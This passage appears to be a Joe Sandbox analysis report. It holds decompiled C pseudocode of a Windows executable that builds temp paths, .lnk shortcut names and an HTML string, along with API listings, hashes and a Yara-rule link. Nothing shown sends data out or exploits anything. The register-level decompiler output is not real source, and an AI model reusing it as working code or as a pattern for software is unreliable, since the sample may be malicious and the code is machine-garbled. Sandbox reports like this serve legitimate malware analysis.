									}
									L132:
									__eax = 0;
									 *(__ebp - 0x4d08) = __ax;
									__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
									__eax = E01026420( *(__ebp - 0x1bd58) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0x105bb82);
										__eax = __ebp - 0x4d08;
										_push(__ebp - 0x4d08);
										__eax = E0100FE56();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x4d08;
										if(__eflags == 0) {
											_push(0x105ab82);
											_push(__eax);
											__eax = E0100FE56();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0x105cb82);
											_push(__eax);
											__eax = E0100FE56();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9d58) = __ax;
									 *(__ebp - 0x3d08) = __ax;
									__ebp - 0x19d58 = __ebp - 0x6d50;
									__eax = E010257E6(__ebp - 0x6d50, __ebp - 0x19d58);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) != __bx) {
										L140:
										__ebp - 0x6d50 = E0100A180(__ebp - 0x6d50);
										__eflags = __al;
										if(__al != 0) {
											goto L157;
										}
										L141:
										__ebx = __edi;
										__esi = __ebp - 0x6d50;
										__eflags =  *(__ebp - 0x6d50) - __bx;
										if( *(__ebp - 0x6d50) == __bx) {
											goto L157;
										}
										L142:
										_push(0x20);
										_pop(__ecx);
										do {
											L143:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L145:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6d50 = E0100A180(__ebp - 0x6d50);
												__eflags = __al;
												if(__al == 0) {
													L152:
													__esi->i = __di;
													L153:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L154;
												}
												L146:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L148:
													_push(0x20);
													_pop(__eax);
													do {
														L149:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x3d08;
													L151:
													_push(__eax);
													__eax = E010257E6();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L153;
												}
												L147:
												 *(__ebp - 0x3d08) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x3d06;
												goto L151;
											}
											L144:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L154;
											}
											goto L145;
											L154:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L157;
									} else {
										L138:
										__ebp - 0x19d56 = __ebp - 0x6d50;
										E010257E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
										_push(__ebx);
										_push(__ebp - 0x6d4e);
										__eax = E010215E8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x3d08 = E010257E6(__ebp - 0x3d08, __ebp - 0x3d08);
											_pop(__ecx);
											_pop(__ecx);
										}
										L157:
										__eflags =  *((short*)(__ebp - 0x11d58));
										__ebx = 0x800;
										if( *((short*)(__ebp - 0x11d58)) != 0) {
											__ebp - 0x9d58 = __ebp - 0x11d58;
											__eax = E0100B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
										}
										__ebp - 0xbd58 = __ebp - 0x6d50;
										__eax = E0100B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
										__eflags =  *(__ebp - 0x4d08);
										if(__eflags == 0) {
											__ebp - 0x4d08 = E0101AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
										}
										__ebp - 0x4d08 = E0100B207(__eflags, __ebp - 0x4d08, __ebx);
										__eflags =  *((short*)(__ebp - 0x17d58));
										if(__eflags != 0) {
											__ebp - 0x17d58 = __ebp - 0x4d08;
											E0100FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
											__eax = E0100B207(__eflags, __ebp - 0x4d08, __ebx);
										}
										__ebp - 0x4d08 = __ebp - 0xcd58;
										__eax = E010257E6(__ebp - 0xcd58, __ebp - 0x4d08);
										__eflags =  *(__ebp - 0x13d58);
										__eax = __ebp - 0x13d58;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19d58;
										}
										__ebp - 0x4d08 = E0100FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
										__eax = __ebp - 0x4d08;
										__eflags = E0100B493(__ebp - 0x4d08);
										if(__eflags == 0) {
											L167:
											__ebp - 0x4d08 = E0100FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
											goto L168;
										} else {
											L166:
											__eflags = __eax;
											if(__eflags == 0) {
												L168:
												_push(1);
												__eax = __ebp - 0x4d08;
												_push(__ebp - 0x4d08);
												E0100A04F(__ecx, __ebp) = __ebp - 0xbd58;
												__ebp - 0xad58 = E010257E6(__ebp - 0xad58, __ebp - 0xbd58);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xad58 = E0100BCCF(__eflags, __ebp - 0xad58);
												__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
												__eax = __ebp - 0x3d08;
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
												__edx = __ebp - 0x9d58;
												__esi = __ebp - 0xad58;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
												 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
												 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
												__eax = __ebp - 0x15d58;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
												E0101A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
												__ebp - 0xbd58 = E01019BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
												__eflags =  *(__ebp - 0xcd58);
												if( *(__ebp - 0xcd58) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcd58;
													_push(__ebp - 0xcd58);
													_push(5);
													_push(0x1000);
													__eax =  *0x1062078();
												}
												goto L172;
											}
											goto L167;
										}
									}
								case 0xa:
									L170:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0x104a470 = 1;
									}
									goto L172;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eax = E01026420( *(__ebp - 0x3508) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0x1048461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0x1048462 = 1;
										} else {
											__eax = 0;
											 *0x1048461 = __al;
											 *0x1048462 = __al;
										}
									}
									goto L172;
								case 0xc:
									L103:
									 *0x105ec99 = 1;
									__eax = __eax + 0x105ec99;
									_t115 = __esi + 0x39;
									 *_t115 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t115;
									__ebp = 0xffffcaf8;
									if( *_t115 != 0) {
										_t117 = __ebp - 0x3508; // 0xffff95f0
										__eax = _t117;
										_push(_t117);
										 *0x103e5fc = E01011798();
									}
									goto L172;
							}
							L2:
							_push(0x1000);
							_push(_t289);
							_push(_t221);
							_t221 = E0101A6C7();
							_t289 = _t289 + 0x2000;
							_t286 = _t286 - 1;
							if(_t286 != 0) {
								goto L2;
							} else {
								_t290 = _t286;
								goto L4;
							}
						}
						L173:
						 *[fs:0x0] =  *((intOrPtr*)(_t294 - 0xc));
						return _t220;
					}
					L110:
					__eflags =  *0x1056b7a;
					if( *0x1056b7a != 0) {
						goto L172;
					}
					L111:
					__eax = 0;
					 *(__ebp - 0x1508) = __ax;
					__eax = __ebp - 0x3508;
					_push(__ebp - 0x3508);
					__eax = E010215E8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L118:
						__eflags =  *(__ebp - 0x1508);
						if( *(__ebp - 0x1508) == 0) {
							__ebp - 0x1bd58 = __ebp - 0x3508;
							E0100FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
							__ebp - 0x1508 = E0100FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
						}
						__ebp - 0x3508 = E0101A4F2(__ebp - 0x3508);
						__eax = 0;
						 *(__ebp - 0x2508) = __ax;
						__ebp - 0x1508 = __ebp - 0x3508;
						__eax = E01019F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L172;
						} else {
							L121:
							__eax = 0;
							__eflags = 0;
							 *0x1048450 = 1;
							 *0x104946a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L122;
						}
					}
					L112:
					__esi = 0;
					__eflags =  *(__ebp - 0x3508) - __dx;
					if( *(__ebp - 0x3508) == __dx) {
						goto L118;
					}
					L113:
					__ecx = 0;
					__eax = __ebp - 0x3508;
					while(1) {
						L114:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L115:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x3508;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x3508 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L116:
						goto L118;
					}
					L117:
					__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
					__ebp - 0x1508 = E0100FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x3508) = __ax;
					goto L118;
					L122:
					__eflags = _t272 - 7;
					if(_t272 == 7) {
						__eflags =  *0x104a46c;
						if( *0x104a46c == 0) {
							 *0x104a46c = 2;
						}
						 *0x1049468 = 1;
					}
					goto L172;
				}
			}

0x0101c534
0x0101c534
0x0101c534
0x0101c534
0x0101c537
0x00000000
0x00000000
0x0101c53d
0x0101c53d
0x0101c543
0x0101c551
0x0101c55d
0x0101c55f
0x0101c561
0x0101c566
0x0101c566
0x0101c566
0x0101c57e
0x0101c58b
0x0101c590
0x0101c592
0x00000000
0x00000000
0x0101c564
0x0101c564
0x0101c564
0x0101c565
0x0101c565
0x0101c594
0x0101c59e
0x0101c5a4
0x0101c5ac
0x0101ca5c
0x0101ca5c
0x0101ca5c
0x0101ca61
0x0101ca65
0x0101ca69
0x0101ca70
0x0101ca77
0x0101ca7a
0x0101ca7f
0x0101ca82
0x0101ca87
0x0101be4b
0x0101be51
0x0101be57
0x0101be57
0x00000000
0x00000000
0x00000000
0x00000000
0x0101be71
0x0101be88
0x0101be8c
0x00000000
0x0101be8e
0x00000000
0x0101be8e
0x0101be8c
0x0101be93
0x0101be96
0x00000000
0x00000000
0x0101be9c
0x0101be9c
0x00000000
0x0101bea3
0x0101bea3
0x0101bea6
0x0101beb9
0x0101bedf
0x0101bef3
0x0101bef6
0x0101bf01
0x0101c045
0x0101c045
0x0101c045
0x0101c04d
0x0101c053
0x0101c058
0x0101c05a
0x00000000
0x00000000
0x0101bf0b
0x0101bf13
0x0101bf19
0x0101bf1f
0x0101bfc5
0x0101bfcc
0x0101bfd2
0x0101bfd5
0x00000000
0x00000000
0x0101bfd7
0x0101bfde
0x0101bfe4
0x0101bfe6
0x00000000
0x0101bfe8
0x0101bfe8
0x0101bfea
0x0101bfeb
0x0101bfef
0x0101c003
0x0101c008
0x0101c012
0x0101c018
0x0101c01b
0x0101bfed
0x0101bfed
0x0101bfee
0x00000000
0x0101c01d
0x0101c02b
0x0101c031
0x0101c033
0x0101c03f
0x0101c03f
0x00000000
0x0101c033
0x0101c01b
0x0101bfe6
0x0101bf25
0x0101bf34
0x0101bf41
0x0101bf52
0x0101bf55
0x0101bf58
0x0101bf6b
0x0101bf72
0x0101bf77
0x0101bf79
0x00000000
0x00000000
0x0101bf7f
0x0101bf86
0x0101bf8b
0x0101bf90
0x0101bf9c
0x0101bfa1
0x0101bfa4
0x0101bfab
0x0101bfad
0x0101bfae
0x0101bfb8
0x0101bfbe
0x0101bfbf
0x00000000
0x0101bfbf
0x0101bf5a
0x0101bf61
0x0101bf67
0x0101bf69
0x00000000
0x00000000
0x00000000
0x0101bf69
0x0101c060
0x0101c060
0x0101c06a
0x0101c06a
0x00000000
0x00000000
0x0101c074
0x0101c074
0x0101c076
0x0101c0c9
0x0101c0ce
0x0101c0d7
0x0101c0d8
0x0101c0de
0x0101c0e3
0x0101c0e6
0x0101c0e8
0x0101c0fa
0x0101c0ff
0x0101c100
0x0101c100
0x0101c101
0x0101c103
0x0101c10a
0x0101c10f
0x0101c103
0x00000000
0x00000000
0x0101c115
0x0101c115
0x0101c117
0x0101c127
0x0101c127
0x00000000
0x00000000
0x0101c132
0x0101c132
0x0101c134
0x00000000
0x00000000
0x0101c13a
0x0101c13a
0x0101c141
0x00000000
0x00000000
0x0101c147
0x0101c147
0x0101c149
0x0101c14f
0x0101c151
0x0101c158
0x0101c159
0x0101c160
0x0101c162
0x0101c162
0x0101c169
0x0101c16e
0x0101c174
0x0101c176
0x00000000
0x0101c17c
0x0101c17c
0x0101c17c
0x0101c17f
0x0101c181
0x0101c182
0x0101c185
0x0101c1ae
0x0101c1ae
0x0101c1b1
0x0101c296
0x0101c29f
0x0101c2a4
0x0101c2a4
0x0101c2a6
0x0101c2a6
0x0101c2a8
0x0101c2aa
0x0101c2b1
0x0101c2b6
0x0101c2b7
0x0101c2b8
0x0101c2ba
0x0101c2bc
0x0101c2c0
0x0101c2c2
0x0101c2c2
0x0101c2c4
0x0101c2c4
0x0101c2c0
0x0101c2c8
0x0101c2ce
0x0101c2db
0x0101c2e2
0x0101c2f2
0x0101c2fc
0x0101c30a
0x0101c310
0x0101c318
0x0101c31d
0x0101c31e
0x0101c31f
0x0101c321
0x0101c335
0x0101c335
0x00000000
0x0101c321
0x0101c1b7
0x0101c1b7
0x0101c1ba
0x0101c1c7
0x0101c1c7
0x0101c1ca
0x0101c1cc
0x0101c1cd
0x0101c1cf
0x0101c1d0
0x0101c1d5
0x0101c1da
0x0101c1e0
0x0101c1e2
0x0101c1e4
0x0101c1e7
0x0101c1ee
0x0101c1ef
0x0101c1f5
0x0101c1f6
0x0101c1f9
0x0101c1fa
0x0101c1fb
0x0101c200
0x0101c203
0x0101c209
0x0101c212
0x0101c215
0x0101c21a
0x0101c21c
0x0101c21e
0x0101c220
0x0101c220
0x0101c222
0x0101c222
0x0101c224
0x0101c224
0x0101c22c
0x0101c233
0x0101c235
0x0101c23c
0x0101c242
0x0101c244
0x0101c245
0x0101c24d
0x0101c25c
0x0101c25c
0x0101c24d
0x0101c267
0x0101c269
0x0101c278
0x0101c27e
0x0101c284
0x0101c28f
0x0101c28f
0x00000000
0x0101c284
0x0101c1bc
0x0101c1bc
0x0101c1c1
0x00000000
0x00000000
0x00000000
0x0101c1c1
0x0101c187
0x0101c187
0x0101c18b
0x00000000
0x00000000
0x0101c18d
0x0101c18d
0x0101c190
0x0101c192
0x0101c195
0x00000000
0x0101c19b
0x0101c1a4
0x00000000
0x0101c1a4
0x0101c195
0x00000000
0x0101c340
0x0101c340
0x0101c341
0x0101c346
0x0101c348
0x0101c34a
0x0101c34b
0x0101c34b
0x00000000
0x0101c381
0x0101c381
0x0101c388
0x0101c38a
0x0101c38a
0x0101c38c
0x0101c3bb
0x0101c3bb
0x0101c3c1
0x00000000
0x0101c3c1
0x0101c38e
0x0101c38e
0x0101c38e
0x0101c391
0x0101c3aa
0x0101c3aa
0x0101c3b0
0x0101c3b0
0x00000000
0x0101c3b0
0x0101c393
0x0101c393
0x0101c393
0x0101c396
0x00000000
0x00000000
0x0101c398
0x0101c398
0x0101c398
0x0101c39b
0x00000000
0x00000000
0x0101c3a1
0x0101c3a1
0x00000000
0x00000000
0x0101c40e
0x0101c40e
0x0101c410
0x0101c417
0x0101c418
0x0101c41e
0x0101c426
0x0101c4ca
0x0101c4ca
0x0101c4ce
0x0101c4e5
0x0101c4e5
0x0101c4e9
0x0101c4ef
0x0101c4f2
0x0101c500
0x0101c500
0x0101c4f2
0x00000000
0x0101c4e9
0x0101c4d0
0x0101c4d0
0x0101c4d3
0x00000000
0x00000000
0x0101c4d9
0x0101c4e0
0x00000000
0x0101c4e0
0x0101c42c
0x0101c42c
0x0101c432
0x0101c434
0x0101c435
0x0101c43a
0x0101c43b
0x0101c43c
0x0101c43e
0x00000000
0x00000000
0x0101c444
0x0101c444
0x0101c444
0x0101c447
0x0101c44a
0x0101c44a
0x0101c44c
0x0101c44f
0x0101c455
0x0101c457
0x0101c458
0x0101c45e
0x0101c45f
0x0101c45f
0x0101c464
0x0101c466
0x0101c468
0x00000000
0x00000000
0x0101c46a
0x0101c46a
0x0101c472
0x00000000
0x00000000
0x0101c474
0x0101c479
0x0101c480
0x0101c485
0x0101c48c
0x0101c48e
0x0101c490
0x0101c497
0x0101c49c
0x0101c49e
0x0101c4a0
0x0101c4a2
0x0101c4a2
0x0101c4a8
0x0101c4af
0x0101c4b4
0x0101c4b6
0x0101c4b8
0x0101c4ba
0x0101c4ba
0x0101c4bb
0x0101c4bd
0x0101c4c3
0x0101c4c4
0x0101c4c4
0x0101c4c7
0x0101c4c7
0x00000000
0x00000000
0x00000000
0x00000000
0x0101c6e0
0x0101c6e0
0x0101c6e3
0x0101c6e5
0x0101c6ec
0x0101c6ee
0x0101c6f4
0x0101c6f5
0x0101c6fa
0x0101c6fb
0x0101c6fb
0x0101c700
0x0101c703
0x0101c709
0x0101c709
0x0101c70e
0x00000000
0x00000000
0x0101c71a
0x0101c71a
0x0101c71d
0x00000000
0x00000000
0x0101c723
0x0101c723
0x0101c725
0x0101c72c
0x0101c734
0x0101c73a
0x0101c73f
0x0101c742
0x0101c777
0x0101c77c
0x0101c782
0x0101c783
0x0101c788
0x0101c744
0x0101c744
0x0101c747
0x0101c74d
0x0101c763
0x0101c768
0x0101c769
0x0101c76e
0x0101c74f
0x0101c74f
0x0101c754
0x0101c755
0x0101c75a
0x0101c75a
0x0101c74d
0x0101c78f
0x0101c791
0x0101c798
0x0101c7a6
0x0101c7ad
0x0101c7b2
0x0101c7b3
0x0101c7b4
0x0101c7b6
0x0101c7b7
0x0101c7be
0x0101c807
0x0101c80e
0x0101c813
0x0101c815
0x00000000
0x00000000
0x0101c81b
0x0101c81b
0x0101c81d
0x0101c823
0x0101c82a
0x00000000
0x00000000
0x0101c82c
0x0101c82c
0x0101c82e
0x0101c82f
0x0101c82f
0x0101c82f
0x0101c832
0x0101c835
0x0101c83f
0x0101c83f
0x0101c841
0x0101c843
0x0101c84d
0x0101c852
0x0101c854
0x0101c892
0x0101c892
0x0101c895
0x0101c895
0x0101c897
0x0101c898
0x0101c898
0x00000000
0x0101c898
0x0101c856
0x0101c856
0x0101c858
0x0101c859
0x0101c85b
0x0101c85e
0x0101c873
0x0101c873
0x0101c875
0x0101c876
0x0101c876
0x0101c876
0x0101c879
0x0101c879
0x0101c87e
0x0101c87f
0x0101c885
0x0101c885
0x0101c886
0x0101c88b
0x0101c88c
0x0101c88d
0x00000000
0x0101c88d
0x0101c860
0x0101c860
0x0101c867
0x0101c86a
0x0101c86b
0x00000000
0x0101c86b
0x0101c837
0x0101c837
0x0101c839
0x0101c83a
0x0101c83d
0x00000000
0x00000000
0x00000000
0x0101c89a
0x0101c89a
0x0101c89d
0x0101c89d
0x0101c8a2
0x0101c8a4
0x0101c8a6
0x0101c8a6
0x0101c8a8
0x0101c8a8
0x00000000
0x0101c7c0
0x0101c7c0
0x0101c7c7
0x0101c7d3
0x0101c7d9
0x0101c7da
0x0101c7db
0x0101c7e0
0x0101c7e3
0x0101c7e5
0x0101c7eb
0x0101c7ed
0x0101c7fb
0x0101c800
0x0101c801
0x0101c801
0x0101c8ab
0x0101c8ab
0x0101c8b3
0x0101c8b8
0x0101c8c2
0x0101c8c9
0x0101c8c9
0x0101c8d6
0x0101c8dd
0x0101c8e2
0x0101c8ea
0x0101c8f6
0x0101c8f6
0x0101c903
0x0101c908
0x0101c910
0x0101c91a
0x0101c927
0x0101c92e
0x0101c92e
0x0101c93a
0x0101c941
0x0101c946
0x0101c94e
0x0101c954
0x0101c955
0x0101c956
0x0101c958
0x0101c958
0x0101c96d
0x0101c972
0x0101c97e
0x0101c980
0x0101c991
0x0101c99e
0x00000000
0x0101c982
0x0101c982
0x0101c98d
0x0101c98f
0x0101c9a3
0x0101c9a3
0x0101c9a5
0x0101c9ab
0x0101c9b1
0x0101c9bf
0x0101c9c4
0x0101c9c5
0x0101c9cd
0x0101c9d2
0x0101c9d9
0x0101c9df
0x0101c9e1
0x0101c9e7
0x0101c9ed
0x0101c9ef
0x0101c9f8
0x0101c9fb
0x0101c9fd
0x0101ca06
0x0101ca09
0x0101ca0f
0x0101ca12
0x0101ca1b
0x0101ca2a
0x0101ca2f
0x0101ca37
0x0101ca39
0x0101ca3a
0x0101ca40
0x0101ca41
0x0101ca43
0x0101ca48
0x0101ca48
0x00000000
0x0101ca37
0x00000000
0x0101c98f
0x0101c980
0x00000000
0x0101ca50
0x0101ca50
0x0101ca53
0x0101ca55
0x0101ca55
0x00000000
0x00000000
0x0101c3cd
0x0101c3cd
0x0101c3d5
0x0101c3db
0x0101c3de
0x0101c402
0x0101c3e0
0x0101c3e0
0x0101c3e3
0x0101c3f6
0x0101c3e5
0x0101c3e5
0x0101c3e7
0x0101c3ec
0x0101c3ec
0x0101c3e3
0x00000000
0x00000000
0x0101c50a
0x0101c50a
0x0101c50b
0x0101c510
0x0101c510
0x0101c510
0x0101c513
0x0101c518
0x0101c51e
0x0101c51e
0x0101c524
0x0101c52a
0x0101c52a
0x00000000
0x00000000
0x0101be58
0x0101be58
0x0101be5d
0x0101be5e
0x0101be5f
0x0101be64
0x0101be6a
0x0101be6d
0x00000000
0x0101be6f
0x0101be6f
0x00000000
0x0101be6f
0x0101be6d
0x0101ca8d
0x0101ca93
0x0101ca9d
0x0101ca9d
0x0101c5b2
0x0101c5b2
0x0101c5b9
0x00000000
0x00000000
0x0101c5bf
0x0101c5bf
0x0101c5c1
0x0101c5c8
0x0101c5d0
0x0101c5d1
0x0101c5d6
0x0101c5d7
0x0101c5d8
0x0101c5da
0x0101c62e
0x0101c62e
0x0101c636
0x0101c644
0x0101c655
0x0101c663
0x0101c663
0x0101c66f
0x0101c674
0x0101c676
0x0101c686
0x0101c690
0x0101c695
0x0101c698
0x00000000
0x0101c69e
0x0101c69e
0x0101c6a3
0x0101c6a3
0x0101c6a5
0x0101c6ac
0x0101c6b2
0x00000000
0x0101c6b2
0x0101c698
0x0101c5dc
0x0101c5de
0x0101c5e0
0x0101c5e7
0x00000000
0x00000000
0x0101c5e9
0x0101c5e9
0x0101c5eb
0x0101c5f1
0x0101c5f1
0x0101c5f1
0x0101c5f5
0x00000000
0x00000000
0x0101c5f7
0x0101c5f7
0x0101c5f8
0x0101c5fe
0x0101c601
0x0101c603
0x0101c606
0x00000000
0x00000000
0x0101c608
0x00000000
0x0101c608
0x0101c60a
0x0101c615
0x0101c61f
0x0101c624
0x0101c624
0x0101c626
0x00000000
0x0101c6b8
0x0101c6b8
0x0101c6bb
0x0101c6c1
0x0101c6c8
0x0101c6ca
0x0101c6ca
0x0101c6d4
0x0101c6d4
0x00000000
0x0101c6bb

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0101C54A
_swprintf.LIBCMT ref: 0101C57E

Part of subcall function 0100400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0100401D

SetDlgItemTextW.USER32(?,00000066,0104946A), ref: 0101C59E
_wcschr.LIBVCRUNTIME ref: 0101C5D1
EndDialog.USER32(?,00000001), ref: 0101C6B2

Strings

%s%s%u, xrefs: 0101C573

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: a0ba38f8a29e6eb95bcf614f6ff14322d53db2f1ea95baf7d720c28a4d374ec8
Instruction ID: e420f561a583d5737892061e9753e698c4bf51eb16291a7cc0cb1750a4b31916
Opcode Fuzzy Hash: a0ba38f8a29e6eb95bcf614f6ff14322d53db2f1ea95baf7d720c28a4d374ec8
Instruction Fuzzy Hash: F241C475940618EAEB32DBA4CC84EDA77BCEF48705F0044E6E589D7094EB799BC4CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01018E62, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E01018E62(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E01018D0A(_t62);
				_push(0x200 + E010235B3(_t62) * 2);
				_t24 = E010235D3(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E010257E6(_t66, L"<html>");
				E01027168(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E01027168(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E010117CE(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E01027168(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E01027168(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E01019098(_t60, _t82);
					}
					_t72 = 9 + E010235B3(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L010235CE(_t66);
					_t24 =  *0x1062178(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E01018D41( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0x1033260(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}

0x01018e62
0x01018e62
0x01018e66
0x01018e6c
0x01018fb3
0x01018fb3
0x01018e72
0x01018e79
0x01018e84
0x01018e94
0x01018e95
0x01018e9a
0x01018ea0
0x01018fad
0x00000000
0x01018fae
0x01018ead
0x01018eb8
0x01018ec3
0x01018ec8
0x01018ecb
0x01018ecf
0x01018ed3
0x01018ede
0x01018ee6
0x01018eed
0x01018eef
0x01018ef1
0x01018ef5
0x01018ef7
0x01018ef7
0x01018efc
0x01018f08
0x01018f10
0x01018f16
0x01018f17
0x01018f1c
0x01018f1e
0x01018f26
0x01018f26
0x01018f32
0x01018f3e
0x01018f42
0x01018f4c
0x01018f61
0x01018f6e
0x01018f63
0x01018f63
0x01018f68
